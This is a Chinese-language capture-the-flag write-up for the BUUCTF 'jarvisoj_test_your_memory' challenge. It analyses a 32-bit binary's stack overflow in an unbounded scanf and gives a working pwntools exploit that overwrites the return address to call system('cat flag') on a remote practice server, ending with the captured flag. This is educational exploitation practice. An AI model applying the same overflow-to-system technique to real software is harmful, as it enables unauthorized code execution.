BUUCTF jarvisoj_test_your_memory

system和cat flag

jarvisoj_test_your_memory

(1)

motaly@motaly-VMware-Virtual-Platform:~/桌面$ file memory
memory: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=3ccdcfa18c0e3f68845cc554555ad0dd9c182858, not stripped
motaly@motaly-VMware-Virtual-Platform:~/桌面$ checksec --file=memory
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   79 Symbols	  No	0		2		memory

(2)

用ida打开，无法反汇编，看main函数的汇编码

int __cdecl main(int argc, const char **argv, const char **envp)
{time_t seed; // eaxchar s2[11]; // [esp+1Dh] [ebp-13h] BYREFint n10; // [esp+28h] [ebp-8h]int i; // [esp+2Ch] [ebp-4h]n10 = 10;puts("\n\n\n------Test Your Memory!-------\n");seed = time(0);srand(seed);for ( i = 0; i < n10; ++i )s2[i] = alphanum_2626[rand() % 0x3Eu];printf("%s", s2);mem_test(s2);return 0;
}

先是生成一个长度为10的随机字符串赋值给s2，并打印出来

然后看到一个mem_test函数，s2作为参数

int __cdecl mem_test(char *s2)
{char s[19]; // [esp+15h] [ebp-13h] BYREFmemset(s, 0, 0xBu);puts("\nwhat???? : ");printf("0x%x \n", hint);                      // "cat flag"puts("cff flag go go go ...\n");printf("> ");__isoc99_scanf("%s", s);if ( !strncmp(s, s2, 4u) )return puts("good job!!\n");elsereturn puts("cff flag is failed!!\n");
}

看到这里有一个hint参数指向cat flag并用printf输出hint地址

接着下面有一个输入赋值给s，这里没限制输入大小，存在缓冲区溢出

最后把输入的s和s2比较前4位是否相同

这里看ida

-0000000000000017     // padding byte
-0000000000000016     // padding byte
-0000000000000015     // padding byte
-0000000000000014     // padding byte
-0000000000000013     _BYTE s;
-0000000000000012     // padding byte
-0000000000000011     // padding byte
-0000000000000010     // padding byte
-000000000000000F     // padding byte
-000000000000000E     // padding byte
-000000000000000D     // padding byte
-000000000000000C     // padding byte
-000000000000000B     // padding byte
-000000000000000A     // padding byte
-0000000000000009     // padding byte
-0000000000000008     // padding byte
-0000000000000007     // padding byte
-0000000000000006     // padding byte
-0000000000000005     // padding byte
-0000000000000004     // padding byte
-0000000000000003     // padding byte
-0000000000000002     // padding byte
-0000000000000001     // padding byte
+0000000000000000     _DWORD __saved_registers;
+0000000000000004     _UNKNOWN *__return_address;
+0000000000000008     char *s2;
+000000000000000C
+000000000000000C // end of stack variables

得到偏移量为0x13+4

(3)

看到有一个win_func函数

int __cdecl win_func(char *command)
{return system(command);
}

里面用了system函数

(4)

这里我们可以把cat flag当作system的参数来获得flag

直接ida中找到cat flag地址

编写

from pwn import *
context(os='linux',arch='i386',log_level='debug')
p=remote('node5.buuoj.cn',28766)
# p = process('/home/motaly/桌面/memory')
system=0x8048440
flag=0x80487E0
main=0x8048677payload=b'a'*(0x13+4)+p32(system)+p32(main)+p32(flag)
p.sendline(payload)p.interactive()

(5)

连接得到flag

[*] Switching to interactive mode
[DEBUG] Received 0x2b bytes:b'flag{67cb5c63-d6f7-4f7f-8746-3eb3f6e53c7b}\n'
flag{67cb5c63-d6f7-4f7f-8746-3eb3f6e53c7b}